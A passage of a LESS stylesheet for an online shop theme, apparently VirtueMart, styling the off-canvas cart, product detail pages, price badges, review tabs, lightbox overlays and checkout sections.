				-webkit-transform: scale(0);
				-moz-transform: scale(0);
				-ms-transform: scale(0);
				-o-transform: scale(0);
				transform: scale(0);
				
				&.empty_basket { 
					-webkit-transform: scale(0);
					-moz-transform: scale(0);
					-ms-transform: scale(0);
					-o-transform: scale(0);
					transform: scale(0);
					color: #fff;
				}
				
				&.items-added {
					color: #fff;
					.transition(all .2s ease);
					-webkit-transform: scale(1);
					-moz-transform: scale(1);
					-ms-transform: scale(1);
					-o-transform: scale(1);
					transform: scale(1);
				}
		
			}
	  }
}

		
#cart-menu.shopping-menu-is-open {
	position:fixed;
	-webkit-transform: translateY(-260px);
	-moz-transform: translateX(-260px);
	-ms-transform: translateX(-260px);
	-o-transform: translateX(-260px);
	transform: translateX(-260px);
	height:100vh;
	width:100vw;

	#cd-menu-trigger,
	.cd-cart {
	  background: rgba(0,0,0,0.2);
	  height:100vh!important;
	  width:100vw;
	  
	  >i {
		  .transition(all 0.3s ease);
		  font-size:34px;
		  top:0;
		  right:0;
		  float:right;
		  padding-right:7px;
		  width:100px;
		  color:#fff!important;
	  }
	  
	  .total_products {
		right:23px;
		font-size: 12px;
		height: 21px;
		width: 21px;
		line-height: 21px;
		-webkit-transform: scale(1);
		-moz-transform: scale(1);
		-ms-transform: scale(1);
		-o-transform: scale(1);
		transform: scale(1);
		font-size:14px;
		color:#fff;
		
		
			&.items-added {
				.transition(font-size);
			}
	
	  }
	}
}

#cart-menu.is-fixed {
  position: fixed;
}

/* -------------------------------- 

Off Canvas

-------------------------------- */

#cd-lateral-nav {
	position: fixed;
	height: 100%;
	right: 0;
	top: 0;
	visibility: hidden;
	z-index: 1002;
	width: 260px;
	padding:10px 20px;
	background: #fff url(../images/cd-lateral-nav.svg) center center repeat;
	box-shadow:-1px 0 10px rgba(0,0,0,.15);
	overflow-y: auto;
	/* Force Hardware Acceleration in WebKit */
	-webkit-transform: translateZ(0);
	-webkit-backface-visibility: hidden;
	-webkit-transition: -webkit-transform .4s 0s, visibility 0s .4s;
	-moz-transition: -moz-transform .4s 0s, visibility 0s .4s;
	transition: transform .4s 0s, visibility 0s .4s;
	-webkit-transform: translateX(260px);
	-moz-transform: translateX(260px);
	-ms-transform: translateX(260px);
	-o-transform: translateX(260px);
	transform: translateX(260px);
	
	.cd-navigation {
		h5 {
			color:@text_color;
		}
	}
}

#cd-lateral-nav.shopping-menu-is-open {
	-webkit-transform: translateX(0);
	-moz-transform: translateX(0);
	-ms-transform: translateX(0);
	-o-transform: translateX(0);
	transform: translateX(0);
	visibility: visible;
	-webkit-transition: -webkit-transform .4s 0s, visibility 0s 0s;
	-moz-transition: -moz-transform .4s 0s, visibility 0s 0s;
	transition: transform .4s 0s, visibility 0s 0s;
	-webkit-overflow-scrolling: touch;
}

 
img, svg {
	max-width: 100%;
}

button {
	-webkit-appearance: none;
	-moz-appearance: none;
	-ms-appearance: none;
	-o-appearance: none;
	appearance: none;
	cursor: pointer;
	border: none;
	padding: 0;
}
button:focus {
	outline: none;
}

#form-login {
	input.button {
		padding:4px 32px 5px;
	}
}


.product_row,
.cd-single-item {
	hr {
		width:100%;
		display:block;
		margin:20px auto 0;
	}
}
/* -------------------------------- 

Single Item

-------------------------------- */
.cd-single-item {
  position: relative;
  display:block;
 
}
.product_name > a {
	display:block;
}
.cart-image {	
	width:35%;
	display:block;

	&.pull-left {
		margin:0 10px 20px 0;
	}
}
.quantity {
	position: relative;
	top:10px;
	left:-3px;
	height: 20px;
	width: 20px;
	line-height: 20px;
	color: #ffffff;
	font-size: 11px;
	font-weight:bold;
	text-align: center;
	border-radius: 50%;
	-webkit-transition: -webkit-transform 0.2s 0s;
	-moz-transition: -moz-transform 0.2s 0s;
	transition: transform 0.2s 0s;
}
.cart-item {
	width:60%;
	display:inline-table;
	span {
	  line-height:22px;
  	}
}
.cd-single-item {
	>a {
	  display: block;
	  background-color: #ffffff;
	  box-shadow: 0 2px 10px rgba(0, 0, 0, 0.08);
	  border-radius: 4px;
	}

}

.no-touch .cd-single-item:hover .cd-customization-trigger, .cd-single-item.hover .cd-customization-trigger {
  /* this is the settings icon - visible on touch devices only */
  display: none;
}

/* -------------------------------- 

Product Customization

-------------------------------- */

.cd-customization {
	.add-to-cart {
		display:block;
		float:left;
		width:140px;
		height: 40px;
		margin:0 auto;
		padding:0;
		border:0;
		outline:0;
		border-radius: 3px;
		position: relative;
		overflow: hidden;
		font-size: 95%;
		font-weight: 600;
		text-transform: uppercase;
		color: #ffffff;
		-webkit-font-smoothing: antialiased;
		-moz-osx-font-smoothing: grayscale;
		box-shadow:inset 0 -1px 0 1px rgba(0,0,0,0.05), inset 0 0 1px rgba(0,0,0,0.05);
		text-shadow:0 1px 2px rgba(0,0,0,0.2);
	}
}

.cd-customization .add-to-cart input[name="addtocart"] {
	background:transparent;
	border:none;
	outline:none;
	line-height:40px;
	position: absolute;
	top: 0;
	left: 0;
	width: 100%;
	height: 100%;
	/* Force Hardware Acceleration */
	-webkit-transform: translateZ(0);
	-moz-transform: translateZ(0);
	-ms-transform: translateZ(0);
	-o-transform: translateZ(0);
	transform: translateZ(0);
	-webkit-backface-visibility: hidden;
	backface-visibility: hidden;
	-webkit-transition: -webkit-transform 0.3s;
	-moz-transition: -moz-transform 0.3s;
	transition: transform 0.3s;
}
.cd-customization .add-to-cart svg {
  /* this is the check icon */
  position: absolute;
  left: 50%;
  top: 50%;
  width: 100%;
  /* move the icon on the right - outside the button */
  -webkit-transform: translateX(50%) translateY(-50%);
  -moz-transform: translateX(50%) translateY(-50%);
  -ms-transform: translateX(50%) translateY(-50%);
  -o-transform: translateX(50%) translateY(-50%);
  transform: translateX(50%) translateY(-50%);
  -webkit-transition: -webkit-transform 0.3s;
  -moz-transition: -moz-transform 0.3s;
  transition: transform 0.3s;
}

.total {
	text-align:center;
	margin-top:30px;
}
.show_cart {
	text-align:center;
	margin:20px auto 25px;
	
	a {
		color:#fff!important;
		display:block;
		width:100%;
		height:100%;
		border-radius:3px;
		border-color: darken(@major_color, 2%);
		background-color: @major_color;
		background-color: fade(@major_color, 90%);
		>i {
			margin-right:10px;
			margin-left:-5px;
		}
			&:hover,
			&:focus {
				border-color: darken(@major_color, 15%);
				background-color: darken(@major_color, 4%);
				color:#fff;
			}
	}
}

/* Template Styling */

.vmLoadingDiv, #fancybox-loading {
	display: none;
	position: fixed;
	z-index: 1100;
	top: 0;
	left: 0;
	padding:0;
	margin:0;
	height: 100%;
	width: 100%;
	background: rgba(255, 255, 255, 0.35) url(../images/vm-loader.svg) 50% 50% no-repeat;
}

//product details page
.productdetails-view {
	
	.vm-product-media-img{
		margin:0 -1px;

		.main-image{
			padding:0;
			margin:0;
			img{
				width: 100%;
				max-height: inherit;
			}
			span.vm-img-desc {
				display:block;
				padding:10px 7px;
				line-height:1.3;
				font-size:85%;
				color:#555;
				text-align:center;
			}
		}
		.additional-images{
	
			margin: 20px auto;
			padding:0;
		
			div.cols {
				display:inline-table;
				float:left;
				text-align:center;
				padding:0;
				margin:0 auto;
				margin-bottom:10px!important;
				
		
				&.cols-1,
				&.cols-2 {
					width:46%;
					margin:0 1.7% 4.5%;
				}
				&.cols-3 {
					width:30%;
					margin:0 1.4% 3.3%;
				}
				&.cols-4 {
					width:22.5%;
					margin:0 1% 3%;
				}
				
				&:last-child{
					margin-right:0;
				}

				
				span.vm-img-desc {
						display:block;
						padding:10px 7px;
						line-height:1.3;
						font-size:80%;
						color:#555;
						text-align:center;
				}
			}
			
			img{
				width: 100%;
				height:100%;
			}
		}
	}
	.vm-product-details-inner{
		.vm-product-title{
			h2{
				font-size: 26px;
				line-height:1.2;
				font-weight: 500;
				float:left;
				margin:0;
			}

		}
		.vm-product-shipments{
			display: none;
		}
		
		.product-price {
			text-align: left;
			margin: 0 auto 10px;
			padding:0;
			display:block;
			height:auto;
			width:100%;
			clear:both;
			
			>div {
				font-size:13px;
				>span + span {
					font-size:15px;
				}
			}
			
			.PricesalesPrice, .PricesalesPriceTt {
				.vm-price-desc {
					font-size: 18px;
				}
				span.PricesalesPrice, span.PricesalesPriceTt {
					font-weight: 600;
					font-size: 25px;
					
				}
			}
		 }
		.product-price *, .product-price .vm-price-desc{
			line-height:1.3;
			
		}
		.PricebasePrice {
			> span.PricebasePrice {
				font-size: 17px;
			}
		}
		.percent-off {
			margin:10px 0 0 0;
			background:fade(@major_color, 75%);
			padding:5px 8px;
			border-radius: 3px;
			width:auto;
			color:#fff;
			font-size:15px;
			font-weight:600;
			text-transform: uppercase;
			box-shadow:0 2px 0 rgba(0,0,0,0.1);
			display:table;
			width:auto;
			text-shadow:1px 1px 2px rgba(0,0,0,0.2);
			
			&:before {
				content:"";
				position:absolute;
				width:5px;
				height:5px;
				margin-top:21px;
				margin-left:1px;
				border-top: 3px solid fade(@major_color, 70%);
				border-bottom: 3px solid transparent;
				border-left: 5px solid fade(@major_color, 70%);
				border-right: 5px solid transparent;
			}
		
			> span {
				margin-left:5px;
			}
		}
		.price-without-discount {
			margin-bottom:8px;
			.PricebasePrice {
				> span.PricebasePrice {
					//font-size: 17px;
					text-decoration: line-through;
				}
			}
		}
		.PricediscountAmount {
			margin-top:8px;
			> span.PricediscountAmount {
				color: @major_color;
			}
		}
			
		
		.product-short-description{
			clear: both;
			margin-bottom: 30px;
			overflow: hidden;
			h4{
				>i {
					font-size:90%;
					margin:5px 5px 0 0;
				}
			}
		}
		span.product-manufacturer {
			.manufacturer {
				display:inline-block;
				margin:0 7px;
			}
		}
		
		
		.spacer-buy-area{
			padding: 0;
			display:block;
			width:100%;
			clear:both;
			
			.availability {
				> img {
					padding:8px 20px 0;
					max-width:160px;
				}
				
			}
			.addtocart-bar{
				padding:0;
				margin:0;
				

	
				.calculate {
					
					display:inline-table;
					float:left;
					margin:4px 20px 0 0;
					
					>label.quantity_box {
						color:#aaa;
						margin-right:5px;
					}
					.quantity-controls{
						background-image:none;
						margin:0;
						
						input.quantity-plus,
						input.quantity-minus {
							display:block;
							position:absolute;	
							z-index:2;			
						}
						input.quantity-plus{
							width:20px;
							height:16px;
							margin:-16px 0 0 0;
						
							&:hover {
								& + .fa {
									color:#999;
									
								}
								& + .fas, & + .far {
									color:#999;
									
								}
							}
							
						}
						input.quantity-minus{
							width:20px;
							height:16px;
							margin:0 0 0 0;
							
							
							&:hover {
								& + .fa {
									color:#999;
									
								}
								& + .fas, & + .far {
									color:#999;
									
								}
							}
							
						}
						.fa, .fas, .far {
							position:absolute;					
							z-index:1;
							font-size:9px;
							line-height: 12px;
							color:#bbb;
							
							&.fa-chevron-up {
								margin:-13px 0 0 5px;
							}
							&.fa-chevron-down {
								margin:0 0 0 5px;
							}
						}					
					}
				}
			}
		}
		div.ask-a-question{
			margin:25px auto 10px;
			float:left;
			display:block;
			clear:both;
			padding:0;
			border: 0;
			
			a.ask-a-question{
				background: none;
				color:#aaa;
				border:0;
				padding:5px 0;
				
			    i{
			    	margin-right:7px;
			    }
				&:hover {
					color:#707070;
				}
			}
		}
		.back-to-category{
		    margin: 25px auto 10px;
			display:inline-table;
			
			a{
				background: none;
			    border-radius:0;
			    padding: 5px;
			    border:0;
			    i{
			    	margin-right:7px;
			    }
			}
			
			+ hr {
				display:block;
				clear:both;
				
			}
			
		}

		/* Navigation left/right */
		.product-neighbours{
			margin:30px auto 0;
			position:relative;
			display:block;
			clear:both;
			width:182px;
			text-align:center;
			
			a.previous-page,
			a.next-page{
				overflow:hidden;
				display:inline-block;
				width:90px;
				height: 40px;
				line-height: 40px;
				margin:0 auto;
				background-image:none;
				padding: 0;
				text-indent: -9999em;
				&:before,
				&:after{
					
					font-family:'Font Awesome 5 Free';
					font-weight:900;
					
					line-height: 40px;
					font-size: 18px;
					padding: 0 17px;
					width:90px;
					color:#fff;
					text-align:center;
					float: left;
					text-indent: 0;
					.transition(300ms);
				}
				&:hover {
					&:before,
				    &:after{
						background: fade(@major_color, 100%);
					}
				}
			}
			a.previous-page{
				&:before{
					content: "\f053";
					border-radius: 4px 0 0 4px;
				}
			}
			a.next-page{
				&:after{
					content: "\f054";
					border-radius: 0 4px 4px 0;
				}
			}
			.empty-previous-page,
			.empty-next-page {
				width: 48%;
				height: 40px;
				line-height: 40px;
				margin:0 auto;
				background: #fff url(../images/empty.svg) center center repeat;
				font-size: 20px;
				padding: 0;
			}
			.empty-previous-page{
				border-radius: 4px 0 0 4px;	
			}
			.empty-next-page{
				border-radius: 0 4px 4px 0;	
			}
		}
	
	}
	// products icons (pdf,print,email)
	.icons {
		margin: 15px 0 0 15px;
		display:block;
		float:right;
		right:3%;
		position:absolute;
		a {
			float: left;
			display:inline-table;
			text-align:center;
			color: #aaa;
			font-weight:normal;
			line-height: 22px;
			font-size: 13px;
			width:27px;
			margin-right:3px;
			border-radius:2px;
			.transition(300ms);
			>img {
				display:none;
			}
			&.printModal {
				&:before{
					
					font-family:'Font Awesome 5 Free';
					font-weight:900;
					content: "\f02f";
				}
			}
			&.recommened-to-friend {
				&:before{
					font-family:'Font Awesome 5 Free';
					font-weight:400;
					content: "\f0e0";
				}
			}
		}
		span.pdf-icon {
			>a {
				&:before{
					font-family:'Font Awesome 5 Free';
					font-weight:400;
					content: "\f1c1";
				}
			}
		}
	}
	
	// products information tab
	.products-desc-tab{
		margin-bottom: 30px;
		.nav-tabs{
			
			>li {
				
				>a{
					text-transform: uppercase;
					background:#f8f8f8;
					border:0;
					border:1px solid #e2e2e2;
					border-bottom:1px solid #e2e2e2;
					margin:0 7px 0 0;
					padding:15px 35px;
					
					>i{
						margin:-1px 10px 0 0;
						font-size:125%;
						vertical-align:top;
						font-weight:500;
					}
				}
			}
		}

		.tab-content{
			border-left: 1px solid #e2e2e2;
		    border-right: 1px solid #e2e2e2;
		    border-bottom: 1px solid #e2e2e2;
		    padding: 30px;
			.tab-pane {
				display: block;
				box-sizing: border-box;
				.rating_wrap {
					margin:20px auto;
					padding:12px 10px 8px;
					background: #eee url(../images/cd-lateral-nav.svg) center center repeat;
					box-shadow:0 0 0px 1px #f7f7f7;
					border-radius:3px;
				}
				.rating {
					margin:10px auto 0;
			
					.ratingbox{
					    display:block;
						background-size: 16px;
						height: 16px;
						width: 80px;
						.stars-orange{
							background-size: 16px;
							height: 16px;
							width: 80px;
						}
						
						span {
							float: left;
							box-sizing: border-box;
						}	
					}	
					
				}
				&.desc div {
					display:none;
				}
				&.review {
					visibility:hidden;
					height:0px;
					overflow:hidden;
				}
				&.desc.active div {
					display:block;
				}
				&.review.active {
					visibility:visible;
					height:auto;
				}
			}
			
			.customer-reviews{
			
				padding:0;
				margin:0;
				h4{
					display: block;
					font-size:135%;
					padding: 0 5% 15px 0;
					margin:0;
				}
				.list-reviews{
					margin:20px auto;
					
					.normal{
						border: none;
						padding: 0;
					}
					span.date{
						border: none;
						display:inline-block;
						border:1px solid #eee;
						border-radius:3px;
						float:left;
						line-height:30px;
						padding:0 10px;
						margin: 6px 25px 0 0;
						
						>i {
							font-weight:800;
							font-size:110%;
							line-height:1.7;
							margin-right:5px;
						}
					}
					span.vote{
				    float:none;
				    margin: 5px 0 15px;
						.ratingbox{
							background-size: 16px;
							height: 16px;
							width:16px;
							width: 80px;
							.stars-orange{
								background-size: 16px;
								height: 16px;
							}
						}
					}
					blockquote{
						border-color: #f2f4f7;
						clear: both;
						padding: 0 20px;
						font-size:90%;
						
						  margin-top: 12px;
						  word-wrap: break-word;
						
						&:before{
						  content: open-quote;
						  vertical-align:middle;
						  line-height:10px;
						  font-weight: 700;
						  font-size: 32px;
						  padding-right: 6px;
						  color:#aaa;
						}
						
						&:after{
						  content: close-quote;
						  vertical-align:middle;
						  line-height:10px;
						  font-weight: 700;
						  font-size: 32px;
						  padding-left: 6px;
						  color:#aaa;
						}
					}
					.bold {
						padding-left:25px;
						font-weight:500;
					}
				}
				.write-reviews {
					
					text-align:left;
					margin:20px 0;
					.step {
					   
					}
				}
			}
		}
	}
}

.empty_cart {
	text-align:center;
	>h3 {
		color:#999;
	}
	>i.pe {
		font-size:77px;
		color:#ccc;
		margin:15px auto;
		>span{
			display:block;
			text-align:center;
			font-size:27%;
			margin:-62px 0 0 32px;
			width:25px;
			height:25px;
			line-height:25px;
			position:absolute;
			border-radius:24px;
		}
	}
}

.vm-pagination-bottom {
	text-align:center;
	.vm-page-counter {
		display:block;
		width:100%;
		text-align:center;
	}
}
	
// Rating Box
.vm-rating{
	width:100%;
	display:block;
	clear:both;
	margin-bottom:25px;
	
	.product-in-stock {
		display:inline-table;
		margin-right:15px;
		color:#777;
		font-size:95%;
		>i {
			color:green;
			font-size:110%;
			font-weight:600;
			vertical-align:top;
			line-height:1.623;
			&.pe-7s-less {
				color:red;
			}
		}
	}
	.ratingbox{
		background-size: 13px;
		width: 65px;
		margin:0;
		.stars-orange {
			background-size: 13px;
			max-width: 65px!important;
			margin-top:12px;
		}
		
	}
}


// fancybox
#fancybox-outer {
	left:0;
	top:0;
	right:0;
	bottom:0;
	background: #fff;
	overflow: visible;
	box-shadow:0 0 22px rgba(0,0,0,.25);
	border-radius:4px;
}

#fancybox-close {
	width: 32px;
	height: 32px;
	background: transparent;

	&:before {
		font-family:'Font Awesome 5 Free';
		font-weight:900;
		color:#fff;
		position:relative;
		font-size: 15px;
		line-height:32px;
		display: inline-block;
		content: "\f00d";
		margin: 0 auto;
		width:32px;
		height:32px;
		text-align:center;
		background:rgba(0,0,0,.5);
		border-radius:3px;
	}
}

#fancybox-loading div {
	display:none;
}

.fancybox-bg {
	width: 0px;
	height: 0px;
	left:0;
	top:0;
}
#fancybox-bg-n,#fancybox-bg-ne,#fancybox-bg-e,#fancybox-bg-se,#fancybox-bg-s,#fancybox-bg-sw,#fancybox-bg-w,#fancybox-bg-nw {
	background-image: none;
	left:0;
	top:0;
	right:0;
	bottom:0;
	width: 0px;
	height: 0px;
	padding:0;
	margin:0;
	border:0;
}

#fancybox-overlay {
	background: #fff!important;

}
#fancybox-wrap{
	overflow: visible!important;
	text-align:center;
	padding:0!important;
	margin:0!important;
	border:0!important;
	

		#fancybox-left-ico,#fancybox-right-ico {
			background: transparent;
			
			&:before {
				font-family:'Font Awesome 5 Free';
				font-weight:900;
				position:absolute;
				color: #fff;
				font-size: 22px;
				line-height:44px;
				width:44px;
				height:44px;
				text-align:center;
				background:rgba(0,0,0,.5);
				border-radius:3px;
				
			}

		
		}
		#fancybox-left-ico {
			&:before {
				position:absolute;
				left:-45px;
				content: "\f053";
			}
		}
		#fancybox-right-ico {
			&:before {
				right:-46px;
				content: "\f054";
			}
		}
		
	
	#fancybox-title{
		width:99%!important;
		position:relative;
		margin: 0 auto;
		background:transparent;
	}
	
	#fancybox-content{
		padding:20px 20px 30px;
	    border: none!important;
	    min-height:70%;
		min-width:70%;
		display:block;
		text-align:center;
		margin:0 auto;

	    h4 {
		    display: block;
		    font-size: 16px;
			line-height:22px;
		    margin: 20px auto;
		}
	   
	}
}
.category-view,
.browse-view,
.latest-view,
.recent-view,
.featured-view,
.topten-view {
	.browse-view {
		h1 {
			margin:0 auto;
		}
	}
	h4 {
		line-height:1.5;
		display:table;
		margin:35px 0 30px;
		font-size:160%;
		padding-right:5%;
		box-shadow:inset 0 -1px 0 rgba(90,90,90,0.15);
		.divider {
	
			clear:both;
			float:left;
			height:10px;
			width:75%;
			border-bottom:2px solid @major_color;
			
		}
	}
	
}

//Views
.category-view,
.browse-view,
.latest-view,
.recent-view,
.featured-view,
.topten-view {
	.row {
		
		&.productwrap {
			list-style: none;
			padding: 0;
			margin: 0 -15px;
			.product, .products {
				border:none;
				margin:0 -1px 20px 0;
			
				.spacer {
					padding: 0;
					margin:0;
					
					.spacer-inner {
						.product-in-stock {
							margin:0 auto 12px;
							color:#777;
							
							span.stock {
								font-size:90%;
							}
							
							i.pe {
								color:green;
								font-size:110%;
								font-weight:600;
								vertical-align:top;
								line-height:1.623;
								&.pe-7s-less {
									color:red;
								}
							}
						}
						.availability {
							> img {
								max-width:160px;
								-webkit-transform:scale(1);
								transform:scale(1);
							}
							
						}
						
					}
	
				}
				
			}

		}
		
		
		.spacer {
			border: 1px solid rgba(0,0,0,.1);
			border-radius:4px;
			padding:0;
			margin:0;
			
			.spacer-img {
				overflow: hidden;
				text-align:center;
				width: 100%;
				margin:0;
				padding:0;
				
			
				img {
					-webkit-transform:scale(1);
					transform:scale(1);
					.transition(300ms);
					display:inline-table;
					float:left;
		
					&.browseProductImage {
						width: 100%;
						max-height: 100%;
					
					}
				}	
				span.overlay {
					width:100.1%;
					height:auto;
					bottom:0;
					left:0;
					right:0;
					padding:20px 20px 19px;
					background-color:rgba(255,255,255,0.5);
					text-align:center;
					display:table;
					position:absolute;
					box-shadow: inset 0 -40px 40px rgba(255,255,255,0.9);
					.transition(300ms);
					>h3 {
						color:#555;
						line-height:1.2;
						padding:0;
						margin:0 auto;
						font-size:140%;
					}
				}
				&:hover {
					span.overlay {
						padding:7% 20px;
						background-color:rgba(255,255,255,0.7);
						box-shadow: inset 0 -50px 50px rgba(255,255,255,0.9), 0 -1px 3px rgba(0,0,0,0.07);
			
						>h3 {
							color:#222;
						}
					}	
				}
			}
			.spacer-inner {
				text-align: center;
				padding: 25px 20px;
					
				h2 {
					margin: 5px auto;
					font-size: 170%;
					line-height:1.5;
					display:block;
					width:100%;
					a {
						.transition(300ms);
					}
				}
				.product_s_desc {
					margin:0 auto;
					hr {
						margin:20px auto;
						width:100%;
						clear:both;	
					}
				}
		
				.product-price {
					margin: 10px auto 0;
					padding:0;
					text-align: center;
					display:block;
					height:auto;
					width:100%;
					clear:both;
			
					
					.percent-off {
	
						background:fade(@major_color, 67%);
						padding:6px 8px;
						position:absolute;
						border-radius: 3px 3px 0 3px;
						top:15px;
						right:-10px;
						color:#fff;
						font-size:14px;
						font-weight:600;
						text-transform: uppercase;
						box-shadow:0 2px 0 rgba(0,0,0,0.1);
						
						&:after {
							content:"";
							position:absolute;
							width:5px;
							height:5px;
							margin-top:23px;
							right:0;
							border-top: 3px solid fade(@major_color, 57%);
							border-bottom: 3px solid transparent;
							border-left: 5px solid fade(@major_color, 57%);
							border-right: 5px solid transparent;
						}
						
						text-shadow:1px 1px 2px rgba(0,0,0,0.2);
						> span {
							margin-left:5px;
						}
					}
					
					>div {
						font-size:13px;
						>span + span {
							font-size:15px;
						}
					}
				 }
				.product-price *, .product-price .vm-price-desc{
					//font-size:15px;
					line-height:1.3;
					
				}
				.PricebasePrice {
					> span.PricebasePrice {
						font-size: 17px;
					}
				}
				.price-without-discount {
					margin-bottom:8px;
					.PricebasePrice {
						> span.PricebasePrice {
							text-decoration: line-through;
							color: @major_color;
						}
					}
				}
				
				.PricediscountAmount {
					margin-top:8px;
					> span.PricediscountAmount {
						color: @major_color;
					}
				}
				.product-price {
					.PricesalesPrice, .PricesalesPriceTt {
						.vm-price-desc {
							font-size: 130%;
						}
						 .PricesalesPrice, .PricesalesPriceTt {
							font-size: 25px;
						 }
					}
				}
				
			}
		
			.addtocart-bar{
				padding:0;
				margin:25px auto 0;
				width:100%;
				display:block;
				
				.cd-customization {
					width:66%;
					width:calc(71% - 10px);
					float:left;
					
					button{
						width:100%;
					}	
				}
				.calculate {
					width:29%;
					display:inline-table;
					float:left;
					margin:4px 10px 0 0;
					
					
					
					>label.quantity_box {
						display:none;
						text-indent:-9999em;
					}
					span.quantity-box{
					/*display: none;*/

						input{
							padding:0;
							border-radius:3px;
							border:0;
							box-shadow: none;
							background:rgba(0,0,0,0.05);
						}
					}
					.quantity-controls{
						/*display: none;*/
						background-image:none;
						margin:0;
						
						input.quantity-plus,
						input.quantity-minus {
							width:20px;
							height:16px;
							display:block;
							position:absolute;	
							z-index:2;
							
						}
						input.quantity-plus{
							margin:-16px 0 0 0;
						
							&:hover {
								& + .fa {
									color:#999;	
								}
								& + .fas, & + .far {
									color:#999;	
								}
							}
							
						}
						input.quantity-minus{
							margin:0;

							&:hover {
								& + .fa {
									color:#999;
								}
								& + .fas, & + .far {
									color:#999;
								}
							}
							
						}
						.fa, .fas, .far {
							position:absolute;					
							z-index:1;
							font-size:9px;
							line-height: 12px;
							color:#bbb;
							
							&.fa-chevron-up {
								margin:-13px 0 0 -3px;
							}
							&.fa-chevron-down {
								margin:0 0 0 -3px;
							}
						}
						
					}
			
				}
	
			}
			
			&:hover {
				img {
					transform:scale(1.1);
				}
			}
		}
		.ratingbox{
			background-size: 13px;
			max-width: 65px!important;
		}
		
		//.vm-product-rating-container .ratingbox,
		//.vm-product-rating-container .vmicon,
		.vm-details-button{
			display: none;
		}
		
	}
	.horizontal-separator {
		height: auto;
		background: none;
		margin: 20px 0;
	}
}


/* Start Cart page */
.vm-order-done {
	text-align:center;
	margin:0 auto;
}


.sectiontableentry1 {
     td {
	
		h4 {
			font-size:145%;
			margin:10px auto 25px;	
		}
			
		.selected_shipment, .selected_payment {
			position:relative;
			background: fade(@text_color, 3%) url('data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1IiBoZWlnaHQ9IjUiPg0KPHJlY3Qgd2lkdGg9IjUiIGhlaWdodD0iNSIgZmlsbD0ibm9uZSI+PC9yZWN0Pg0KPHBhdGggZD0iTTAgNUw1IDBaTTYgNEw0IDZaTS0xIDFMMSAtMVoiIHN0cm9rZT0iI2ZmZiIgc3Ryb2tlLXdpZHRoPSIxIj48L3BhdGg+DQo8L3N2Zz4=') center center repeat;
			padding:20px 5px;
			display:block;
			.flexbox();
			.flex-align-items();
			.flex-justify-content(center);
			border:1px solid rgba(126,126,126,0.1);
			border-radius:4px;
			
			i.pe-7s-check {
				color:lighten(@major_color, 15%);
				font-size:32px;
				line-height:1;
				vertical-align:middle;
				position:absolute;
				right:8px;
				top:-14px;
			}
			
			.vmCartShipmentLogo, .vmCartPaymentLogo {
				
				float:left;
				margin:0 12px;
				>img {
					max-width:150px;
					max-height:70px;
					margin:0 auto;
					
				}
			
			}
			span {
				font-size:100%;
				line-height:20px;
			
				
				&.vmshipment_name {
					font-size:100%;
					text-align:left;
					margin:0;
					
				}
				&.vmpayment_name{
					font-size:100%;
					text-align:left;
					margin:0;
		
				}
				
				&.vmshipment_description {
					font-size:90%;
					text-align:left;
					padding-left:8px;
				
				}
				&.vmpayment_description {
					font-size:90%;
					text-align:left;
					padding-left:8px;
					color:@text_color;

				}
				
			}
			.vmpayment_description {
					font-size:100%;
					text-align:left;
					margin:0;
					
				}
			& + span {
				  margin:0 auto;
			}
			
			
				
		}
	
		h3.vm-shipment-header-selected,
		h3.vm-payment-header-selected {
			font-size:120%;
			margin:30px auto 25px;
		}
		.vm-shipment-select, .vm-payment-select {
			
			span {
				display:block;
				clear:both;
				
				&.fee {
					display:block;
					clear:both;
					margin:5px auto 10px;
				}
				
			}
		}
		.vm-payment-select {
			text-align:center;
			color:@text_color;
			
			.vmpayment_description {
				line-height:18px;
				font-size:75%;
				color:@text_color;
				margin:0 auto 10px;
				opacity:1;
			}
		}
		
		  .vmCartShipmentLogo,.vmCartPaymentLogo {
			text-align:center;
			margin:0 auto;
			
			img {
				max-width:180px;
				max-height:70px;
				margin:5px auto;
				
			}
			& + span {
				  /*display:none;*/
				  margin:0 auto;  
			}
		
		  }
		  	.vmCartPaymentLogo {
				& + span {
					display:none;				  
				}
			}
		  
		 a.change-payment {
			 display:block;
			 margin:10px auto 0;
			 width:auto;
			 font-size:90%;
			 
			 &:after {
				 font-family: 'peIcon7';
				 content: "\e68e";
				 font-size:135%;
				 line-height:1;
				 vertical-align:middle;
				 padding-left:7px;
			 }
		 }
		 
   }
  
}
 #customer_note_field {
   width:100%!important;
   min-height: 100px;
}
.vmpayment_name {
	& + span {
		font-size:80%;
		color:@major_color;
		font-weight:normal;
	}
}

.cart-view{
	.vm-head, .vm-cart-header{
		padding: 10px 0;
		h1{
			font-size:240%;
			padding: 5px 0;
			margin: 0;
		}
		
	}
	.jumbotron {
		.btn {
			i {
				margin:-4px 10px 0 -5px;
			}
		}
	}
	.vm-continue-shopping {
		.btn-continue {
			display:block;
			margin:20px auto;
			
			i {
				&.pe {
					margin:-2px 0 0 0;
					line-height:1.2;
					font-size:115%;
					text-align:center;
					vertical-align:middle;
				}
			}
			.continue_link {
				padding:8px 12px;
			}
		}
	}
	
	
	input,textarea,input[type="text"]{
		-webkit-box-shadow: none;
		box-shadow: none;
		border-radius: 0;
	}
	input[value="Logout"],
	input[name="changeShopper"],
	input[value="Search in shop"]{
		background: #e7e7ea;
	    border: none;
		border-radius:3px;
	    margin-left: 20px;
	    padding: 5px 10px;
	    .transition(all .3s);
	    &:hover{
	    	color: #fff;
	    }
	}
	input[name="changeShopper"]{
	    position: relative;
	    top: -16px;
	    left: 10px;
	}
	input[value="Search in shop"]{
	    margin: 0 !important;
	}
	.chzn-container-single{
	    margin-left: 30px;
		.chzn-single{
			height: 35px;
		    margin-top: -20px;
		    line-height: 35px;
		}
	}
	fieldset.userdata{
		p.width30{
			input{
				width: 100%;
			}
			input:hover,
			input:focus{
				box-shadow: none;
			}			
		}
		#com-form-login-remember{
			input{
				width: 60px;
				border: 0;
				padding: 5px 0;
				margin-right: 10px;
				color: #fff;
				.transition(500ms);
				
				&.inputbox {
					max-width:24px;
					vertical-align:middle;
					background:transparent;
					&:hover {
						background:transparent;
					}
				}
			}
		}
	}
	.billto-shipto{
		margin: 50px 0;
		padding: 50px 0;
		a.details{
			color: #fff;
			padding: 5px 17px;
			margin:7px auto;
			border: 0;
			.transition(500ms);
		}
		&+fieldset{
			overflow-x: scroll;
		    min-width: 200px;
		}
		.output-shipto{
			input{
				margin-left: 10px;
			}
			.controls{
				label{
					padding-left: 20px;
				}
				input{
					margin-left: -20px;
				}
			}
		}
	}
	.cart-summary{
		.vmCartPaymentLogo{
			margin-right: 10px;
